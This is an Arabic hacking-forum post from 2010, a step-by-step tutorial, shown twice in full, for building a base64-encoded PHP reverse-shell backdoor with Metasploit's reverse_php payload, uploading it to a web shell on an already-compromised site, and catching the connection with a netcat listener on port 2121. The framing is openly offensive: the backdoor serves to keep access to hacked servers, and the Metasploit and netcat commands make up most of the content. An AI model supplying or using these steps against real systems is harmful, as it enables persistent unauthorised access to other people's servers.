BLACK.JaGuAr
04-30-2010, 04:54 PM
http://www.samygames.com/forumim/basmla/68565.gif
http://www.samygames.com/forumim/slam/6867867.gif
تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم وبمناسبة خروج الأخ الحبيب ASDELY-ScOrPiOn من الأسر بفضل الله ، يطيب لي أن أطرح لكم موضوع مميز وحصري عن طريقة عمل باك دور بالميتاسبلويت والإتصال به من خلال أداة النت كات ....
نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور ....
الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور .
use payload/php/reverse_php
الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي .
set LHOST your ip
الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي .
set LPORT 2121
الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور .
set encoder php/base64
http://www.aljyyosh.com/images/black/4/81141830.jpg
بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : ..
generate -t raw
سينتج عن الأمر السابق تكون أكواد مشفرة كما توضح الصورة التالية نقوم بتحديد الكود وفقا لما هو موضح في الصورة تماما
http://www.aljyyosh.com/images/black/4/51071274.jpg
بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية الصفحة كما توضح الصورة التالية ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً ..
http://www.aljyyosh.com/images/black/4/42902397.jpg
بعد ذلك نقوم بحفظ الملف بامتداد php كما توضح الصورة التالية تمهيدا لرفعه على الشيل ..
http://www.aljyyosh.com/images/black/4/52958718.jpg
بعد ذلك نقوم برفع ملف الباك دور إلى الشيل كما توضح الصورة التالية
http://www.aljyyosh.com/images/black/4/49658693.jpg
بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي :
nc -lvp 2121
http://www.aljyyosh.com/images/black/4/99246249.jpg
الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح كما توضح الصورة التالية :
http://www.aljyyosh.com/images/black/4/70918523.jpg
بعد تشغيل الباك دور نتوجه لأداة الــ netcat وتوضح الصور التالية نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض وكانت النتائج ممتازة بفضل الله ويظهر لنا من خلال الإستعراض وجود ملف الباك دور
http://www.aljyyosh.com/images/black/4/46999532.jpg
http://www.aljyyosh.com/images/black/4/65802941.jpg
نسأل الله أن نكون قد وفقنا بتوضيح الموضوع بصورة مبسطة ومفهومة للجميع ونأسف على أي تقصير ( جميع الحقوق محفوظة لمنتديات جيوش الهكرز )
ودمتم سالمين
http://www.samygames.com/forumim/slam/6867867.gif
تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم وبمناسبة خروج الأخ الحبيب ASDELY-ScOrPiOn من الأسر بفضل الله ، يطيب لي أن أطرح لكم موضوع مميز وحصري عن طريقة عمل باك دور بالميتاسبلويت والإتصال به من خلال أداة النت كات ....
نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور ....
الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور .
use payload/php/reverse_php
الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي .
set LHOST your ip
الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي .
set LPORT 2121
الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور .
set encoder php/base64
http://www.aljyyosh.com/images/black/4/81141830.jpg
بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : ..
generate -t raw
سينتج عن الأمر السابق تكون أكواد مشفرة كما توضح الصورة التالية نقوم بتحديد الكود وفقا لما هو موضح في الصورة تماما
http://www.aljyyosh.com/images/black/4/51071274.jpg
بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية الصفحة كما توضح الصورة التالية ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً ..
http://www.aljyyosh.com/images/black/4/42902397.jpg
بعد ذلك نقوم بحفظ الملف بامتداد php كما توضح الصورة التالية تمهيدا لرفعه على الشيل ..
http://www.aljyyosh.com/images/black/4/52958718.jpg
بعد ذلك نقوم برفع ملف الباك دور إلى الشيل كما توضح الصورة التالية
http://www.aljyyosh.com/images/black/4/49658693.jpg
بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي :
nc -lvp 2121
http://www.aljyyosh.com/images/black/4/99246249.jpg
الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح كما توضح الصورة التالية :
http://www.aljyyosh.com/images/black/4/70918523.jpg
بعد تشغيل الباك دور نتوجه لأداة الــ netcat وتوضح الصور التالية نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض وكانت النتائج ممتازة بفضل الله ويظهر لنا من خلال الإستعراض وجود ملف الباك دور
http://www.aljyyosh.com/images/black/4/46999532.jpg
http://www.aljyyosh.com/images/black/4/65802941.jpg
نسأل الله أن نكون قد وفقنا بتوضيح الموضوع بصورة مبسطة ومفهومة للجميع ونأسف على أي تقصير ( جميع الحقوق محفوظة لمنتديات جيوش الهكرز )
ودمتم سالمين